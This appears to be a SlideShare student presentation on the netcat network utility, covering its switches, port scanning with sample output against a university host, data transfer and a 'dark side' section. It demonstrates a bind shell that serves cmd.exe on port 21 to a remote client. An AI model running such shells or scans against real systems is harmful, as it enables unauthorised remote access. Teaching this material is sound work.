SlideShare a Scribd company logo
1 of 25
netcat
Purpose of Presentation…?
 Analyze the network
 Identify the network security issues
How to do it …?
First Step  Research the Network
Tools for Research
 Information Gathering tools
 Forensic tools
 Network Utility tools
 Password Auditing tools
 Recovery And Restoration Tools
 Vulnerability Scanning & Analysis tools
What is netcat ?
 Swiss Army Knife of Network
 A versatile network Utility tool
 Uses TCP and UDP protocol
 Designed as a backend tool
Can be used directly
Driven by other programs
Power of netcat
 Can create Outbound or Inbound
connections TCP or UDP to or from any
ports
 Full DNS forward reverse checking
 Can use any local port
 Can use any locally configured network
address
 Port scanning with randomizer
 Option to let other program service
establish connections
 Optional telnet responder
How Do I use netcat ?
 General form of usage is
nc [switches] [hostname] [portnumber]
 Simplest Usage would be
nc –v www.msn.com 80
Use GET method GET / HTTP/1.0
 Hostname can be a name or IP
Address
 Use of –n switch
 If not specified performs forward and reverse
DNS look up
 Reports the problem of mismatched names in
DNS
D:toolsnc>nc -v www.hotmail.com 80
DNS fwd/rev mismatch: www.hotmail.com != hotmail.se
DNS fwd/rev mismatch: www.hotmail.com !=
ld.cb.msn.com
DNS fwd/rev mismatch: www.hotmail.com !=
ld.cb.msn.com
www.hotmail.com [207.68.171.233] 80 (http) open
IF specified will take only IPAddress as hostname
argument
Options
 -v
Controls the verbosity level
 -w <seconds>
Sets the network inactivity timeout
 -p <port number>
Binds the connection to specific port
number
Options
 -o <file name>
To obtain hexdump file of data sent
either way
 -l
Makes netcat wait for inbound
connections
And once connection is established it
transfers the data
Interesting -l
 Can use to create like a listening
netcat server
 On listening end
D:toolsnc>nc –l -p 1234 < test.txt
 On client end
D:toolsnc>nc 192.168.0.100 1234
Options
 -L
Listen harder
 -r
Randomize port numbers
 -z
Zero – I/O mode [used in scanning]
Options
 -e <program name>
Allows to execute a program
(dangerous)
 -d
Allows to run in detached mode
without console window
 -u
Makes a UDP connection instead of
TCP connection
Options
 -s <address>
Local source address
 -i <seconds>
Specifies delay interval for lines sent
or ports scanned
 -t
Answer telnet negotiation
Put the Knife to Use
 Use It GOOD
 Use It BAD
USE IT GOOD
 Port Scanning
Find what is out there
• nc –v –w 5 –r davinci.newcs.uwindsor.ca 20-30
D:toolsnc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30
davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) open
SSH-2.0-Sun_SSH_1.0
davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) open
davinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) open
internet2 proxy-telnet [v3.1] ready
√☺Please enter your userid: davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?)
open
davinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open
220-Sendmail 8.6.12/8.6.12 ready on internet2
220 ESMTP spoken here
davinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open
220- internet2 proxy-ftp [v3.1] ready
220 Please enter your userid
D:toolsnc>
USE IT GOOD
 Simple Data Transfer Agent
Immaterial which side is server and
which side is client
Input at one goes as output to another
 HEX Dump Feature
Can be used to analyze odd network
protocols
USE IT GOOD
 Performance Testing
 Generate large amount of useless data on
network with server on one end and client on
other end we can use it to test network
performance.
 Protect your workstations X server
DARK SIDE
 Scanning for vulnerable services
Can use files as input to netcat and
scan the system by using –i and –r
switches
 Can use –e option to execute
programs
 SYN-Bombing
Can disable TCP servers
EXAMPLE
 Listen on port 21 (FTP Port) using
netcat with –e switch to execute
cmd.exe
 FTP request made from a different
machine on the listener machine
RESULT
D:toolsnc>nc -l -p 21 -e cmd.exe
LISTENER
C:Documents and SettingsRAJAT>ftp 192.168.0.100
Connected to 192.168.0.100.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:toolsnc>
Request
Environment
 Local Home Network
ISP --- Cogeco
Three PC’s OS Windows XP
Connected via DLink Router
Cat 5 connecting cables used
Conclusion
 Netcat is a very useful network utility
tool
 Very light but extremely effective
 Particularly when it can listen and
execute programs when connection
requests are made on the specific
ports
Credits
 Chris Wysopal
 Hobbit
 www.atstake.com
THANK YOU

More Related Content

What's hot

Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port ScanningSam Bowne
 
Wireshark, Tcpdump and Network Performance tools
Wireshark, Tcpdump and Network Performance toolsWireshark, Tcpdump and Network Performance tools
Wireshark, Tcpdump and Network Performance toolsSachidananda Sahu
 
Ethical hacking Chapter 6 - Port Scanning - Eric Vanderburg
Ethical hacking   Chapter 6 - Port Scanning - Eric VanderburgEthical hacking   Chapter 6 - Port Scanning - Eric Vanderburg
Ethical hacking Chapter 6 - Port Scanning - Eric VanderburgEric Vanderburg
 
Packet analysis using wireshark
Packet analysis using wiresharkPacket analysis using wireshark
Packet analysis using wiresharkBasaveswar Kureti
 
Network Packet Analysis with Wireshark
Network Packet Analysis with WiresharkNetwork Packet Analysis with Wireshark
Network Packet Analysis with WiresharkJim Gilsinn
 
Introduction to tcpdump
Introduction to tcpdumpIntroduction to tcpdump
Introduction to tcpdumpLev Walkin
 
TELNET and SSH by MUSTAFA SAKHAI
TELNET and SSH by MUSTAFA SAKHAITELNET and SSH by MUSTAFA SAKHAI
TELNET and SSH by MUSTAFA SAKHAIMUSTAFA SAKHAI
 
Traceroute- A Networking Tool
Traceroute- A Networking ToolTraceroute- A Networking Tool
Traceroute- A Networking ToolAmit Kumar
 
Telnet & SSH Configuration
Telnet & SSH ConfigurationTelnet & SSH Configuration
Telnet & SSH ConfigurationVinod Gour
 
Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Andriy Berestovskyy
 

What's hot (20)

Tcpdump
TcpdumpTcpdump
Tcpdump
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
Wireshark, Tcpdump and Network Performance tools
Wireshark, Tcpdump and Network Performance toolsWireshark, Tcpdump and Network Performance tools
Wireshark, Tcpdump and Network Performance tools
 
Wireshark ppt
Wireshark pptWireshark ppt
Wireshark ppt
 
Ethical hacking Chapter 6 - Port Scanning - Eric Vanderburg
Ethical hacking   Chapter 6 - Port Scanning - Eric VanderburgEthical hacking   Chapter 6 - Port Scanning - Eric Vanderburg
Ethical hacking Chapter 6 - Port Scanning - Eric Vanderburg
 
Packet analysis using wireshark
Packet analysis using wiresharkPacket analysis using wireshark
Packet analysis using wireshark
 
Port numbers
Port numbersPort numbers
Port numbers
 
What is Ping
What is PingWhat is Ping
What is Ping
 
Network Packet Analysis with Wireshark
Network Packet Analysis with WiresharkNetwork Packet Analysis with Wireshark
Network Packet Analysis with Wireshark
 
Wireshark
WiresharkWireshark
Wireshark
 
Wireshark tutorial
Wireshark tutorialWireshark tutorial
Wireshark tutorial
 
Introduction to tcpdump
Introduction to tcpdumpIntroduction to tcpdump
Introduction to tcpdump
 
TELNET and SSH by MUSTAFA SAKHAI
TELNET and SSH by MUSTAFA SAKHAITELNET and SSH by MUSTAFA SAKHAI
TELNET and SSH by MUSTAFA SAKHAI
 
Firewall Facts
Firewall FactsFirewall Facts
Firewall Facts
 
Wireshark
WiresharkWireshark
Wireshark
 
Nmap
NmapNmap
Nmap
 
Traceroute- A Networking Tool
Traceroute- A Networking ToolTraceroute- A Networking Tool
Traceroute- A Networking Tool
 
Telnet & SSH Configuration
Telnet & SSH ConfigurationTelnet & SSH Configuration
Telnet & SSH Configuration
 
Wireshark
WiresharkWireshark
Wireshark
 
Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)Networking Fundamentals: Transport Protocols (TCP and UDP)
Networking Fundamentals: Transport Protocols (TCP and UDP)
 

Viewers also liked

ZipCode_Distance_by_Agent_Home_Zip_2015091501
ZipCode_Distance_by_Agent_Home_Zip_2015091501ZipCode_Distance_by_Agent_Home_Zip_2015091501
ZipCode_Distance_by_Agent_Home_Zip_2015091501Robert Davis
 
sandip Resume (1) (1).docx 1
sandip Resume (1) (1).docx 1sandip Resume (1) (1).docx 1
sandip Resume (1) (1).docx 1Sandip Atugade
 
Presentation 2 1
Presentation 2 1Presentation 2 1
Presentation 2 1Franbri45
 
Seattle Interactive Conference 2014 Brochure
Seattle Interactive Conference 2014 BrochureSeattle Interactive Conference 2014 Brochure
Seattle Interactive Conference 2014 Brochureweaveuser
 
Pubblicità Elettronautica Cosentino
Pubblicità Elettronautica CosentinoPubblicità Elettronautica Cosentino
Pubblicità Elettronautica Cosentinodariloja
 
Test powerpoint
Test powerpointTest powerpoint
Test powerpointskunz55
 
Voyage of Independence II ARC August 2011 bremerhaven to baltimore
Voyage of Independence II ARC August 2011 bremerhaven to baltimoreVoyage of Independence II ARC August 2011 bremerhaven to baltimore
Voyage of Independence II ARC August 2011 bremerhaven to baltimoreThe Diesel Driver
 
Stephanie Cairns, Member, Alberta Climate Leadership Panel
Stephanie Cairns, Member, Alberta Climate Leadership PanelStephanie Cairns, Member, Alberta Climate Leadership Panel
Stephanie Cairns, Member, Alberta Climate Leadership PanelSustainable Prosperity
 
Silverman powerpoint assignment
Silverman powerpoint assignmentSilverman powerpoint assignment
Silverman powerpoint assignmentSarah Silverman
 

Viewers also liked (11)

ZipCode_Distance_by_Agent_Home_Zip_2015091501
ZipCode_Distance_by_Agent_Home_Zip_2015091501ZipCode_Distance_by_Agent_Home_Zip_2015091501
ZipCode_Distance_by_Agent_Home_Zip_2015091501
 
sandip Resume (1) (1).docx 1
sandip Resume (1) (1).docx 1sandip Resume (1) (1).docx 1
sandip Resume (1) (1).docx 1
 
Presentation 2 1
Presentation 2 1Presentation 2 1
Presentation 2 1
 
Seattle Interactive Conference 2014 Brochure
Seattle Interactive Conference 2014 BrochureSeattle Interactive Conference 2014 Brochure
Seattle Interactive Conference 2014 Brochure
 
Pubblicità Elettronautica Cosentino
Pubblicità Elettronautica CosentinoPubblicità Elettronautica Cosentino
Pubblicità Elettronautica Cosentino
 
Test powerpoint
Test powerpointTest powerpoint
Test powerpoint
 
Fs moskau zimmer
Fs moskau zimmerFs moskau zimmer
Fs moskau zimmer
 
Dave Sawyer, Enviro Economics
Dave Sawyer, Enviro EconomicsDave Sawyer, Enviro Economics
Dave Sawyer, Enviro Economics
 
Voyage of Independence II ARC August 2011 bremerhaven to baltimore
Voyage of Independence II ARC August 2011 bremerhaven to baltimoreVoyage of Independence II ARC August 2011 bremerhaven to baltimore
Voyage of Independence II ARC August 2011 bremerhaven to baltimore
 
Stephanie Cairns, Member, Alberta Climate Leadership Panel
Stephanie Cairns, Member, Alberta Climate Leadership PanelStephanie Cairns, Member, Alberta Climate Leadership Panel
Stephanie Cairns, Member, Alberta Climate Leadership Panel
 
Silverman powerpoint assignment
Silverman powerpoint assignmentSilverman powerpoint assignment
Silverman powerpoint assignment
 

Similar to 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02

Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Nikhil Raj
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
Network programming in Java
Network programming in JavaNetwork programming in Java
Network programming in JavaTushar B Kute
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaHanaysha
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Network Programming in Java
Network Programming in JavaNetwork Programming in Java
Network Programming in JavaTushar B Kute
 
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber  - Training: Choosing Nagios Plugins To UseNagios Conference 2011 - Mike Weber  - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To UseNagios
 
Nachos Theoretical assigment 3
Nachos Theoretical assigment 3Nachos Theoretical assigment 3
Nachos Theoretical assigment 3colli03
 
Application Layer and Socket Programming
Application Layer and Socket ProgrammingApplication Layer and Socket Programming
Application Layer and Socket Programmingelliando dias
 

Similar to 8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02 (20)

Netcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army KnifeNetcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army Knife
 
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
 
CN 1.docx
CN 1.docxCN 1.docx
CN 1.docx
 
Network programming in Java
Network programming in JavaNetwork programming in Java
Network programming in Java
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocols
 
nwlab-ex1.pdf
nwlab-ex1.pdfnwlab-ex1.pdf
nwlab-ex1.pdf
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Network Programming in Java
Network Programming in JavaNetwork Programming in Java
Network Programming in Java
 
Chap 1 Network Theory & Java Overview
Chap 1   Network Theory & Java OverviewChap 1   Network Theory & Java Overview
Chap 1 Network Theory & Java Overview
 
Networking in Java
Networking in JavaNetworking in Java
Networking in Java
 
Firewall
FirewallFirewall
Firewall
 
6 networking
6 networking6 networking
6 networking
 
5 - Networking in Red Hat
5 - Networking in Red Hat5 - Networking in Red Hat
5 - Networking in Red Hat
 
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber  - Training: Choosing Nagios Plugins To UseNagios Conference 2011 - Mike Weber  - Training: Choosing Nagios Plugins To Use
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
 
Nachos Theoretical assigment 3
Nachos Theoretical assigment 3Nachos Theoretical assigment 3
Nachos Theoretical assigment 3
 
Application Layer and Socket Programming
Application Layer and Socket ProgrammingApplication Layer and Socket Programming
Application Layer and Socket Programming
 

Recently uploaded

Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girlsssuser7cb4ff
 
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdfCCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdfAsst.prof M.Gokilavani
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionDr.Costas Sachpazis
 
computer application and construction management
computer application and construction managementcomputer application and construction management
computer application and construction managementMariconPadriquez1
 
complete construction, environmental and economics information of biomass com...
complete construction, environmental and economics information of biomass com...complete construction, environmental and economics information of biomass com...
complete construction, environmental and economics information of biomass com...asadnawaz62
 
Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.eptoze12
 
An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...Chandu841456
 
8251 universal synchronous asynchronous receiver transmitter
8251 universal synchronous asynchronous receiver transmitter8251 universal synchronous asynchronous receiver transmitter
8251 universal synchronous asynchronous receiver transmitterShivangiSharma879191
 
Correctly Loading Incremental Data at Scale
Correctly Loading Incremental Data at ScaleCorrectly Loading Incremental Data at Scale
Correctly Loading Incremental Data at ScaleAlluxio, Inc.
 
Past, Present and Future of Generative AI
Past, Present and Future of Generative AIPast, Present and Future of Generative AI
Past, Present and Future of Generative AIabhishek36461
 
Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfme23b1001
 
Comparative Analysis of Text Summarization Techniques
Comparative Analysis of Text Summarization TechniquesComparative Analysis of Text Summarization Techniques
Comparative Analysis of Text Summarization Techniquesugginaramesh
 
Gurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort service
Gurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort serviceGurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort service
Gurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort servicejennyeacort
 
What are the advantages and disadvantages of membrane structures.pptx
What are the advantages and disadvantages of membrane structures.pptxWhat are the advantages and disadvantages of membrane structures.pptx
What are the advantages and disadvantages of membrane structures.pptxwendy cai
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxDeepakSakkari2
 
Application of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptxApplication of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptx959SahilShah
 
Concrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptxConcrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptxKartikeyaDwivedi3
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEroselinkalist12
 

Recently uploaded (20)

Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girls
 
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdfCCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
CCS355 Neural Network & Deep Learning UNIT III notes and Question bank .pdf
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
 
computer application and construction management
computer application and construction managementcomputer application and construction management
computer application and construction management
 
complete construction, environmental and economics information of biomass com...
complete construction, environmental and economics information of biomass com...complete construction, environmental and economics information of biomass com...
complete construction, environmental and economics information of biomass com...
 
Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.Oxy acetylene welding presentation note.
Oxy acetylene welding presentation note.
 
An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...An experimental study in using natural admixture as an alternative for chemic...
An experimental study in using natural admixture as an alternative for chemic...
 
8251 universal synchronous asynchronous receiver transmitter
8251 universal synchronous asynchronous receiver transmitter8251 universal synchronous asynchronous receiver transmitter
8251 universal synchronous asynchronous receiver transmitter
 
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptxExploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
Exploring_Network_Security_with_JA3_by_Rakesh Seal.pptx
 
Correctly Loading Incremental Data at Scale
Correctly Loading Incremental Data at ScaleCorrectly Loading Incremental Data at Scale
Correctly Loading Incremental Data at Scale
 
Past, Present and Future of Generative AI
Past, Present and Future of Generative AIPast, Present and Future of Generative AI
Past, Present and Future of Generative AI
 
POWER SYSTEMS-1 Complete notes examples
POWER SYSTEMS-1 Complete notes  examplesPOWER SYSTEMS-1 Complete notes  examples
POWER SYSTEMS-1 Complete notes examples
 
Electronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdfElectronically Controlled suspensions system .pdf
Electronically Controlled suspensions system .pdf
 
Comparative Analysis of Text Summarization Techniques
Comparative Analysis of Text Summarization TechniquesComparative Analysis of Text Summarization Techniques
Comparative Analysis of Text Summarization Techniques
 
Gurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort service
Gurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort serviceGurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort service
Gurgaon ✡️9711147426✨Call In girls Gurgaon Sector 51 escort service
 
What are the advantages and disadvantages of membrane structures.pptx
What are the advantages and disadvantages of membrane structures.pptxWhat are the advantages and disadvantages of membrane structures.pptx
What are the advantages and disadvantages of membrane structures.pptx
 
Biology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptxBiology for Computer Engineers Course Handout.pptx
Biology for Computer Engineers Course Handout.pptx
 
Application of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptxApplication of Residue Theorem to evaluate real integrations.pptx
Application of Residue Theorem to evaluate real integrations.pptx
 
Concrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptxConcrete Mix Design - IS 10262-2019 - .pptx
Concrete Mix Design - IS 10262-2019 - .pptx
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
 

8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02

  • 2. Purpose of Presentation…?  Analyze the network  Identify the network security issues How to do it …? First Step  Research the Network
  • 3. Tools for Research  Information Gathering tools  Forensic tools  Network Utility tools  Password Auditing tools  Recovery And Restoration Tools  Vulnerability Scanning & Analysis tools
  • 4. What is netcat ?  Swiss Army Knife of Network  A versatile network Utility tool  Uses TCP and UDP protocol  Designed as a backend tool Can be used directly Driven by other programs
  • 5. Power of netcat  Can create Outbound or Inbound connections TCP or UDP to or from any ports  Full DNS forward reverse checking  Can use any local port  Can use any locally configured network address  Port scanning with randomizer  Option to let other program service establish connections  Optional telnet responder
  • 6. How Do I use netcat ?  General form of usage is nc [switches] [hostname] [portnumber]  Simplest Usage would be nc –v www.msn.com 80 Use GET method GET / HTTP/1.0  Hostname can be a name or IP Address
  • 7.  Use of –n switch  If not specified performs forward and reverse DNS look up  Reports the problem of mismatched names in DNS D:toolsnc>nc -v www.hotmail.com 80 DNS fwd/rev mismatch: www.hotmail.com != hotmail.se DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com www.hotmail.com [207.68.171.233] 80 (http) open IF specified will take only IPAddress as hostname argument
  • 8. Options  -v Controls the verbosity level  -w <seconds> Sets the network inactivity timeout  -p <port number> Binds the connection to specific port number
  • 9. Options  -o <file name> To obtain hexdump file of data sent either way  -l Makes netcat wait for inbound connections And once connection is established it transfers the data
  • 10. Interesting -l  Can use to create like a listening netcat server  On listening end D:toolsnc>nc –l -p 1234 < test.txt  On client end D:toolsnc>nc 192.168.0.100 1234
  • 11. Options  -L Listen harder  -r Randomize port numbers  -z Zero – I/O mode [used in scanning]
  • 12. Options  -e <program name> Allows to execute a program (dangerous)  -d Allows to run in detached mode without console window  -u Makes a UDP connection instead of TCP connection
  • 13. Options  -s <address> Local source address  -i <seconds> Specifies delay interval for lines sent or ports scanned  -t Answer telnet negotiation
  • 14. Put the Knife to Use  Use It GOOD  Use It BAD
  • 15. USE IT GOOD  Port Scanning Find what is out there • nc –v –w 5 –r davinci.newcs.uwindsor.ca 20-30
  • 16. D:toolsnc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30 davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) open SSH-2.0-Sun_SSH_1.0 davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) open davinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) open davinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) open internet2 proxy-telnet [v3.1] ready √☺Please enter your userid: davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?) open davinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) open davinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open 220-Sendmail 8.6.12/8.6.12 ready on internet2 220 ESMTP spoken here davinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) open davinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) open davinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) open davinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open 220- internet2 proxy-ftp [v3.1] ready 220 Please enter your userid D:toolsnc>
  • 17. USE IT GOOD  Simple Data Transfer Agent Immaterial which side is server and which side is client Input at one goes as output to another  HEX Dump Feature Can be used to analyze odd network protocols
  • 18. USE IT GOOD  Performance Testing  Generate large amount of useless data on network with server on one end and client on other end we can use it to test network performance.  Protect your workstations X server
  • 19. DARK SIDE  Scanning for vulnerable services Can use files as input to netcat and scan the system by using –i and –r switches  Can use –e option to execute programs  SYN-Bombing Can disable TCP servers
  • 20. EXAMPLE  Listen on port 21 (FTP Port) using netcat with –e switch to execute cmd.exe  FTP request made from a different machine on the listener machine
  • 21. RESULT D:toolsnc>nc -l -p 21 -e cmd.exe LISTENER C:Documents and SettingsRAJAT>ftp 192.168.0.100 Connected to 192.168.0.100. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. D:toolsnc> Request
  • 22. Environment  Local Home Network ISP --- Cogeco Three PC’s OS Windows XP Connected via DLink Router Cat 5 connecting cables used
  • 23. Conclusion  Netcat is a very useful network utility tool  Very light but extremely effective  Particularly when it can listen and execute programs when connection requests are made on the specific ports
  • 24. Credits  Chris Wysopal  Hobbit  www.atstake.com